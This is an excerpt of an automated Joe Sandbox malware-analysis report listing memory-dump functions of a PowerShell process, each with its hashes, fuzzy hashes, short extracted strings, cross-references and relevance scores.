Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID: tMTl$`^q$`^q$`^q$`^q
API String ID: 0-1660071224
Opcode ID: 3636b75772a604fadf096db0f318f0a61b8e927da96d0cfe121fd9560a6e8d0e
Instruction ID: 356a9cef58ffcba60389e5a151445bfcbf7fc67c20e020ff8722b7d6d761ba9e
Opcode Fuzzy Hash: 3636b75772a604fadf096db0f318f0a61b8e927da96d0cfe121fd9560a6e8d0e
Instruction Fuzzy Hash: 30B1E774E012199FCB54DFA9D980A9DFBF6FF88304F208629D419AB354EB34A905CF90

Function 04C87A30 Relevance: 6.5, Strings: 5, Instructions: 234COMMON

Download Yara Rule

Strings

`^q, xrefs: 04C87C44
`^q, xrefs: 04C87BA2
`^q, xrefs: 04C87B23
tMTl, xrefs: 04C87AD4
`^q, xrefs: 04C87CC2

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID: tMTl$`^q$`^q$`^q$`^q
API String ID: 0-1660071224
Opcode ID: 6a839edf23364ad50f3c0602b2c5df37f8313fffc53d8c7b08a45270a669f431
Instruction ID: e538dfab952ccdc3aecfb0f04ace43da540d8b22a079a9131e0118361ebcaaf0
Opcode Fuzzy Hash: 6a839edf23364ad50f3c0602b2c5df37f8313fffc53d8c7b08a45270a669f431
Instruction Fuzzy Hash: C9B1D774E012199FCB54DFA9D980A9DFBF6FF88304F208629D419AB354EB34A905CF90

Function 07A437F0 Relevance: 6.3, Strings: 5, Instructions: 71COMMON

Download Yara Rule

Strings

$]q, xrefs: 07A4382A
Jl, xrefs: 07A4386D
Jl, xrefs: 07A4387B
$]q, xrefs: 07A43836
$]q, xrefs: 07A437FF

Memory Dump Source

Source File: 00000009.00000002.2231680711.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a40000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$Jl$Jl
API String ID: 0-1194273129
Opcode ID: f67a820fb96380740f9ce114626eece1179a4b194edc4303f1a47f1aa91484db
Instruction ID: 1ccd2f3f5b4a4d74c7c098f662906ebdbd88bbc87ed7d0d9933263a6224980f8
Opcode Fuzzy Hash: f67a820fb96380740f9ce114626eece1179a4b194edc4303f1a47f1aa91484db
Instruction Fuzzy Hash: E1110B713043169BEF285A6E9840B26FBAAFFD1722F34C42BE86597291CA73C445C751

Function 04C84D62 Relevance: 5.1, Strings: 4, Instructions: 109COMMON

Download Yara Rule

Strings

m^, xrefs: 04C84DD2
m^, xrefs: 04C84D82
m^, xrefs: 04C84DE2
m^, xrefs: 04C84D62

Memory Dump Source

Source File: 00000009.00000002.2203722452.0000000004C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_4c80000_powershell.jbxd

Similarity

API ID:
String ID: m^$m^$m^$m^
API String ID: 0-3502344340
Opcode ID: 42cbda4982abaf7692792265d9e4da5a9a352edf28f53b0fd7f636b33456cc06
Instruction ID: 5c590a95990e457a6ae79f23b836491cfdc7169f00f2ea2292771c44306be083
Opcode Fuzzy Hash: 42cbda4982abaf7692792265d9e4da5a9a352edf28f53b0fd7f636b33456cc06
Instruction Fuzzy Hash: 9F410721A4E3D04FC3079B3C99A49953FF5AEA725471A40EBD0C5CF273E928D80AC766

Function 07A45798 Relevance: 5.1, Strings: 4, Instructions: 94COMMON

Download Yara Rule

Strings

$]q, xrefs: 07A457C6
$]q, xrefs: 07A457AA
$]q, xrefs: 07A457F4
$]q, xrefs: 07A45800

Memory Dump Source

Source File: 00000009.00000002.2231680711.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a40000_powershell.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: ffaed30e86840f62c3cbbb3bb415f9b831d6a920d8b33774beeb84c2a12b45a3
Instruction ID: 7663f692e9575db7df797b075a8effda66b39ac5cee30f78c88022090ac7867a
Opcode Fuzzy Hash: ffaed30e86840f62c3cbbb3bb415f9b831d6a920d8b33774beeb84c2a12b45a3
Instruction Fuzzy Hash: 992149B1B442069BDB385A3A8C40B37B7E6AFD0712F64883AE915CB281DE37C8118361

Function 07A4030A Relevance: 5.0, Strings: 4, Instructions: 50COMMON

Download Yara Rule

Strings

$]q, xrefs: 07A4035E
4']q, xrefs: 07A4037F
4']q, xrefs: 07A40373
$]q, xrefs: 07A40352

Memory Dump Source

Source File: 00000009.00000002.2231680711.0000000007A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 07A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7a40000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$$]q$$]q
API String ID: 0-978391646
Opcode ID: c9f834c3010862e4ab2a176370b1da53a3db6aadff62b78f2a3a67ce9debc114
Instruction ID: 43218a3b2b10ce03e38c50767611cd2a01e1e7a2173e8ab99240ade6b822e2cb
Opcode Fuzzy Hash: c9f834c3010862e4ab2a176370b1da53a3db6aadff62b78f2a3a67ce9debc114
Instruction Fuzzy Hash: 9401DF7270D3914FC72F16381A3016A6FB25FC391171A84D7C191CF2A7C92A4D09C3A7

Analysis Process: powershell.exePID: 1784, Parent PID: 6608COMMON

Execution Graph

Execution Coverage:	6.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	3
Total number of Limit Nodes:	0

Executed Functions

Function 0486B490 Relevance: 2.8, Strings: 2, Instructions: 252
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

{Y$n^, xrefs: 0486B6F0, 0486B6F5
Y$n^, xrefs: 0486B557

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID: {Y$n^$Y$n^
API String ID: 0-2025320977
Opcode ID: ae654df164da2aad1bc3cf47ac2e06ba0987e8b6d082b4a27fc356113021f313
Instruction ID: 36692bd275c4939dccb4fe1d2a43e83aa6249e1aadb91fd55c21d94baabcf919
Opcode Fuzzy Hash: ae654df164da2aad1bc3cf47ac2e06ba0987e8b6d082b4a27fc356113021f313
Instruction Fuzzy Hash: AA917574B407149BEB59EFB484115AEB7E2EFC4604B00CA2DD15AAB340DF74AE06CBD6

Function 07713CE8 Relevance: 5.6, Strings: 4, Instructions: 592
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4']q, xrefs: 07714026
4']q, xrefs: 0771418A
4']q, xrefs: 07714030
4']q, xrefs: 07714180

Memory Dump Source

Source File: 0000000C.00000002.2297018551.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7710000_powershell.jbxd

Similarity

API ID:
String ID: 4']q$4']q$4']q$4']q
API String ID: 0-1785108022
Opcode ID: a47ce7975d1f9e7ac9f846408c081f2b135729e80ab1ad01b2484535de6b07be
Instruction ID: d7b3e391e938b4f412084d7e77b6a2e6ca0007a4f8494ab859de059223ccd66a
Opcode Fuzzy Hash: a47ce7975d1f9e7ac9f846408c081f2b135729e80ab1ad01b2484535de6b07be
Instruction Fuzzy Hash: D41256B17042518FCB258B6C98117AABBE6EFC2390F15C8AAD405CB652DB36C846C7A1

Function 08986421 Relevance: 1.6, APIs: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE(EFD80843), ref: 0898648A

Memory Dump Source

Source File: 0000000C.00000002.2301558455.0000000008980000.00000040.00000800.00020000.00000000.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8980000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID:
API String ID: 3254676861-0
Opcode ID: e9691e36bb85f4aadffb99795b8744d587fe9eb3f55b7a6a7670bd6ae3355430
Instruction ID: ce417288b42d7beff8e96a78d1090e852b14b7dce6a5b97ef8fddd67f3747c20
Opcode Fuzzy Hash: e9691e36bb85f4aadffb99795b8744d587fe9eb3f55b7a6a7670bd6ae3355430
Instruction Fuzzy Hash: AD1116B59002498FCB20DFAAC589BAEFFF4AB88324F248459D459A7210C775A945CFA1

Function 08986428 Relevance: 1.5, APIs: 1, Instructions: 48
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetThreadToken.KERNELBASE(EFD80843), ref: 0898648A

Memory Dump Source

Source File: 0000000C.00000002.2301558455.0000000008980000.00000040.00000800.00020000.00000000.sdmp, Offset: 08980000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_8980000_powershell.jbxd

Similarity

API ID: ThreadToken
String ID:
API String ID: 3254676861-0
Opcode ID: 7ac6700c253cc63c05f71a20594fc8d9a9b5ce8d0f452c4d2ba52d16965bec55
Instruction ID: 261e8faab693f3057da6ffcd4e3a8df1b07a94c39be965995b46ec961d944080
Opcode Fuzzy Hash: 7ac6700c253cc63c05f71a20594fc8d9a9b5ce8d0f452c4d2ba52d16965bec55
Instruction Fuzzy Hash: 091136B19003098FCB10EF9AC588B9EFBF8EF48324F148419D418A7310C779A944CFA5

Function 04866FC8 Relevance: 1.4, Strings: 1, Instructions: 114
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(aq, xrefs: 048670ED

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID: (aq
API String ID: 0-600464949
Opcode ID: 8587bece886e71cbe6bce4dc6ee97e3780cdf249f37f082909a7db33eea98cb1
Instruction ID: 9df6019a5342216cee09d745ecb71a3a4d00624634601479c4e789b8a7e2d318
Opcode Fuzzy Hash: 8587bece886e71cbe6bce4dc6ee97e3780cdf249f37f082909a7db33eea98cb1
Instruction Fuzzy Hash: F1417C34B002048FDB14DFA4C554AAEBBF2EF8E314F1585A9E402EB395DA36EC01CB61

Function 0486E610 Relevance: 1.4, Strings: 1, Instructions: 106
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JUl, xrefs: 0486E6EA

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID: JUl
API String ID: 0-3583675650
Opcode ID: 4129a2f6137911117b3cbe51b5a21785ecd3cb5bde2da526c8c18ab9d5793264
Instruction ID: 458e32090a7f05772d12bb8b1828044e94b301712de8109c0e0b7858dbbbe4a7
Opcode Fuzzy Hash: 4129a2f6137911117b3cbe51b5a21785ecd3cb5bde2da526c8c18ab9d5793264
Instruction Fuzzy Hash: 3A41BF34A052459FCB15CF78D554A9EBFF2EF4A300F1486A9D446EB392CB34AC05CB90

Function 0486E640 Relevance: 1.3, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

JUl, xrefs: 0486E6EA

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID: JUl
API String ID: 0-3583675650
Opcode ID: a7d5004f3dba5157e2c1795c77b7d0c427e8a1d6d938f92c3ceff35095bb64d9
Instruction ID: 0dafc36a7b59c8b84509f13f359814603569a3cf6f4e82a46ac6f0f9b9e953bf
Opcode Fuzzy Hash: a7d5004f3dba5157e2c1795c77b7d0c427e8a1d6d938f92c3ceff35095bb64d9
Instruction Fuzzy Hash: CB314D74A00209DFCB24DF69D554A9EBBF2FF49300F108668D416EB794DB34AD05CB90

Function 0486AF98 Relevance: 1.3, Strings: 1, Instructions: 81
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(&]q, xrefs: 0486AFBA

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID: (&]q
API String ID: 0-1343553580
Opcode ID: 3920c7c1b1f82c1a42c3f5c527367388fc081a7dc7b862c628cdbc3244606346
Instruction ID: 1b440f91ab2384d300a0a2fec5931f68ad0b4f52a4a69277eac7d365f8accb95
Opcode Fuzzy Hash: 3920c7c1b1f82c1a42c3f5c527367388fc081a7dc7b862c628cdbc3244606346
Instruction Fuzzy Hash: 9921D171A042588FCB14DFAED4046AFBFF5EF89320F14846AD419E7340CA75A805CBA5

Function 0486E7B8 Relevance: .3, Instructions: 254
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 007bb1f155f0b4ffd6129b1f71c46bc1c042591e5d59f122e15e6c1dc2d2b7b5
Instruction ID: 4468d2f294a46f86bb5faf95ed6b9655fb9dd82216f8c2de2719d4e0e58cecf2
Opcode Fuzzy Hash: 007bb1f155f0b4ffd6129b1f71c46bc1c042591e5d59f122e15e6c1dc2d2b7b5
Instruction Fuzzy Hash: A1919F38B00219CFCB54DF69D95056DBBF6AF88710B14896AD806EB365EF34EC42CB91

Function 048629F0 Relevance: .2, Instructions: 209
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f9e60ef10d53b12e8bfd5222a678c0ec415e5ddef431d38392d5ebe5668268d
Instruction ID: 0788d9abf58127f28ba704c62f31c35ba7c5b626834b2e837d28306add8a80c4
Opcode Fuzzy Hash: 2f9e60ef10d53b12e8bfd5222a678c0ec415e5ddef431d38392d5ebe5668268d
Instruction Fuzzy Hash: 74916874A002099FCB15CF5CC5949AABBB1FF48310B258A99D856EB365C735FC91CBA0

Function 04867728 Relevance: .2, Instructions: 156
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5062c2a45be7156343fe8053439fd2591fd701371737960726f35b0cacc8cc4c
Instruction ID: 4a3498595c2f59f0263b3c066c1e6a3e62469bdef8d3cb66a3ffc23a3bf1e913
Opcode Fuzzy Hash: 5062c2a45be7156343fe8053439fd2591fd701371737960726f35b0cacc8cc4c
Instruction Fuzzy Hash: C551D2347042059FD744DB69D844A6B7BEAFFC9318B1589B9E50ACB352EB35EC01CBA0

Function 077128E8 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2297018551.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 270646208936522d20a1796a9fdddf5c24838f6000f0fb0de8ad7c28e12a9c78
Instruction ID: 8f7a08d4be32270bed2432c0ee525f5b9be7c91ba81a93cf60049efe11b9618b
Opcode Fuzzy Hash: 270646208936522d20a1796a9fdddf5c24838f6000f0fb0de8ad7c28e12a9c78
Instruction Fuzzy Hash: 6C5124B1704385CFC7219B6C88516AABBE6EF86311F1084AADA05DB293DE35CC45C7A2

Function 0486BAC0 Relevance: .2, Instructions: 155COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2fffba03be0b99d8e0fbb79c58d28def7b1b441e8f0ed716bf4ca4b3cb6b3c20
Instruction ID: 43a75d19b8356fb5ca0b854b7992c6055b3893356c8f9abd354a548e03673aa8
Opcode Fuzzy Hash: 2fffba03be0b99d8e0fbb79c58d28def7b1b441e8f0ed716bf4ca4b3cb6b3c20
Instruction Fuzzy Hash: E1613971E00258CFCB54CFA9C584A9DBBF5EF88314F15856AE819EB254EB34AD41CB50

Function 0486BAB0 Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7759cb29df3613abc41859d0087021f9b298a47aff0e58a01fa2bd1c02de2f6
Instruction ID: ce7fc7bac8f04781872d7669e301a53f052cb209191124a9b996a916fc5bdb2c
Opcode Fuzzy Hash: b7759cb29df3613abc41859d0087021f9b298a47aff0e58a01fa2bd1c02de2f6
Instruction Fuzzy Hash: E5514871E00258CFCB54CFA9D584A8DBBF5FF88314F14856AE81AEB364EB34A945CB50

Function 0771271F Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2297018551.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 73fc528f13dce0649c127605f946667a77a518b13738dba19377d01b7909d375
Instruction ID: 1d2e00a1233e37c226fe0218f717ffb0496b6cc8ba2d9114bca379d24ed0bb3f
Opcode Fuzzy Hash: 73fc528f13dce0649c127605f946667a77a518b13738dba19377d01b7909d375
Instruction Fuzzy Hash: FF4126B5740206DFDB109A6C88406AAB7E6FF85351F04887AEA01CB692DB35D954C762

Function 0486E419 Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2d50405977ea600c18a08d790b943cb8ce33c7a272744cee18427f718fbb9cfb
Instruction ID: 9e029b77a85a8d6b2c419955c57cfa849d1111f1afaa2fe2a2775d2df0e11692
Opcode Fuzzy Hash: 2d50405977ea600c18a08d790b943cb8ce33c7a272744cee18427f718fbb9cfb
Instruction Fuzzy Hash: 1E519334B002058FCB14DF7CD59596ABBE6EFC831471589A9D54ACF366EB34EC028B91

Function 0486E428 Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8b60e6ddcc3e69767d6ff3e4ed051cabdf35771f0ea9ee3909a4ddfd68b1e9f
Instruction ID: e0c9c3818812e063574bbb7d79b574a6bd6053c93795359edfda6941456c3b95
Opcode Fuzzy Hash: b8b60e6ddcc3e69767d6ff3e4ed051cabdf35771f0ea9ee3909a4ddfd68b1e9f
Instruction Fuzzy Hash: 59415178B00205CFCB14DF6CD59496ABBE6EFC8314B158969E54ACF365EB34EC018B91

Function 07713CCE Relevance: .1, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2297018551.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7710000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81f3f6a25d13589e11fa75e49c759a41198a69c593a700b1dbaccb0174c685e5
Instruction ID: 17c9433ef01eceb03e4cd0afc93e785104e1381588792c44c2cd0c48c66df5ba
Opcode Fuzzy Hash: 81f3f6a25d13589e11fa75e49c759a41198a69c593a700b1dbaccb0174c685e5
Instruction Fuzzy Hash: D34126F0A043029BCB208F6CC942AAB7BB29F81794F0588A6D9409F256C736DD49C7A1

Function 04862B00 Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 521700be9f1c35ba4eb870b76baf42dbf5ff2cdb2cd436bc42fb09a819d2f6f6
Instruction ID: 08b3d72a4393ac544f4d732b7d875415947c004292eb8d451d33774c7657aab1
Opcode Fuzzy Hash: 521700be9f1c35ba4eb870b76baf42dbf5ff2cdb2cd436bc42fb09a819d2f6f6
Instruction Fuzzy Hash: 56411875A00505DFCB06DF58C5D89AAFBB1FF48310B258A99D856AB364C732FC91CBA0

Function 0486C388 Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0cb5d8bf9ec7c265db7e722f125ea3a0515a188299c8ff42f574db3baced7529
Instruction ID: 51c2eac5524fbd497914761f7ddd7f2882deabc93f8e6206c403e6d984a8980c
Opcode Fuzzy Hash: 0cb5d8bf9ec7c265db7e722f125ea3a0515a188299c8ff42f574db3baced7529
Instruction Fuzzy Hash: 9A31CE353042019FD319EB78E850BAEB79AEFC4214F008679D60ACB365DF74E809CBA1

Function 04866FA9 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bbc67a417ef1d52488638094e3d69bb737bcbd8ff34c818b5f75b88961166c5
Instruction ID: 3f3262875d56345df2723759b65ebbd0d2efcc42aa18ad6e998d1cc85af53031
Opcode Fuzzy Hash: 5bbc67a417ef1d52488638094e3d69bb737bcbd8ff34c818b5f75b88961166c5
Instruction Fuzzy Hash: 76317234B042458FCB14DFA4C5549AABFF1AF8E318F1485A8D446EB361DB31DC01CB61

Function 0486AE60 Relevance: .1, Instructions: 89COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: df7b10ef7311f13de7205eb0b5f87f7f081dcdcdb00cba687883c96a491efa21
Instruction ID: 4a42aac8c8e988afbd8bbd13e34bd31f72d6e8d23e9f9fae3f55bab236cb20e2
Opcode Fuzzy Hash: df7b10ef7311f13de7205eb0b5f87f7f081dcdcdb00cba687883c96a491efa21
Instruction Fuzzy Hash: BE316D70E002098FDB58DFB9C494AAEBBF6EF89304F14846DE406EB354EB749C418B61

Function 0486AD28 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4f93136e5f721c695d739e1ffc9381da1ab08e23a754155c36c3c1afa57362fd
Instruction ID: ccf011954f95b6350b714dbd820d83992aa5c52a4a32b688b2720b739a7a08c6
Opcode Fuzzy Hash: 4f93136e5f721c695d739e1ffc9381da1ab08e23a754155c36c3c1afa57362fd
Instruction Fuzzy Hash: FE31ABB8A002049FDB05DFB4D854AEE7BB2EFC5300F1184B9D115AB395CA38AD018B61

Function 0486AE70 Relevance: .1, Instructions: 84COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ce003719144079453bc94e4bb776c0455d6eca48a2adfa78ab59c334157f1b1b
Instruction ID: bfc9591410b4bbaf59c681c28e7c8bf6e1052f83f46c67d09fd80540a800e64a
Opcode Fuzzy Hash: ce003719144079453bc94e4bb776c0455d6eca48a2adfa78ab59c334157f1b1b
Instruction Fuzzy Hash: 58314F70E002098FDB58DFA9D4947AEBAF6EF89304F108469E406EB354EB749C018B65

Function 0486E049 Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5dac56be22cdb720ec4b73599f9cd9640911e1a766e95827ad6099f23cc4bde2
Instruction ID: bd3466027b87deba9bd4149af722bb1ca84a7f1edd069525ef7e5eb5582965c3
Opcode Fuzzy Hash: 5dac56be22cdb720ec4b73599f9cd9640911e1a766e95827ad6099f23cc4bde2
Instruction Fuzzy Hash: 95316A74A002048FCB68DF68D458AAEBBF2FF89315F448669D406EB361DB35AC41CF91

Function 0486E058 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5b0351a42b143be5e3327d3a5fe3c2a5754e162aa1baf8934934532c7b144f6
Instruction ID: 4faa7ac9fdd030ae6f5c68474a5e91be89743630e45ccffe192c010cf11d3779
Opcode Fuzzy Hash: a5b0351a42b143be5e3327d3a5fe3c2a5754e162aa1baf8934934532c7b144f6
Instruction Fuzzy Hash: FD312774A002048FCB24DF68D458AAEBBF2EF89315F449669D406EB390DF35AC41CF91

Function 0486AD38 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2266456275.0000000004860000.00000040.00000800.00020000.00000000.sdmp, Offset: 04860000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_4860000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f53b61fffdc25bec7fd8fd4055f98cca527b1c701876813c95cb922612b9f563
Instruction ID: 932154a6139b98becc405b47136dd4fc3b0047c5edc8f8474bd58a9a823cb047
Opcode Fuzzy Hash: f53b61fffdc25bec7fd8fd4055f98cca527b1c701876813c95cb922612b9f563
Instruction Fuzzy Hash: F03141B8A002099FDB04EFA4D854AEE77B6EFC4304F1094B9D215AB394DA35ED018F51

Function 0304F3D8 Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2265787772.000000000304D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0304D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_304d000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 404aef22e9fa0ce28132b6802910244753901da1231de73a38ec6412892fdb05
Instruction ID: d3c8b9aa6ae5829251866fe736906290c7ce78393ec93fe8e50bdfec8b1ea876
Opcode Fuzzy Hash: 404aef22e9fa0ce28132b6802910244753901da1231de73a38ec6412892fdb05
Instruction Fuzzy Hash: E92127B1504201DFCB05DF14E9C0F16BFA5FB88314F24C5B9E9090A656C73AD556CBA1

Function 077128C6 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.2297018551.0000000007710000.00000040.00000800.00020000.00000000.sdmp, Offset: 07710000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7710000_powershell.jbxd

